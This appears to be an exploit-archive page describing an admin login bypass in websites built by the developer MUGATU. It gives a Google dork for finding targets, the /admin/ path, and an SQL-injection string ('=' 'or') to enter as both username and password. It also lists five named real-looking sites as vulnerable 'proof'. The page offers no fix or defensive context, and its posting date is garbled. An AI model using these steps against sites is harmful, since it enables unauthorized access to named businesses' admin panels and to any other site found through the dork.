Home / os / winmobile

Desarrollo MUGATU Bypass Admin Page Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Desarrollo MUGATU Bypass Admin Page Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|=============================================================| |-------------------In The Name Of God------------------------| | | Exploit Title: Desarrollo MUGATU Bypass Admin Page Vulnerability | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.mugatu.com.uy/ | | Google Dork : intext:"Diseño y desarrollo MUGATU" | | Tested on: Windows 10 ~~~> Mozilla Firefox | | Date: 1/20/2017 |==========================================================| | Then Choose a Target and put this after URL : /admin/ |=========| | And fill username and password like the information below : | Username : '=' 'or' | Password : '=' 'or' | ==========================================================| | Proof : | | https://www.lasgaviotas.com/admin | | http://www.werke.uy/admin | | http://www.farmaciatrouville.com.uy/admin | | http://www.altix.com.uy/admin/ | | http://www.concrespuma.com.uy/admin/ | |=============================================================| | Discovered By : HackFans |=============================================================|</BODY></HTML>

 

TOP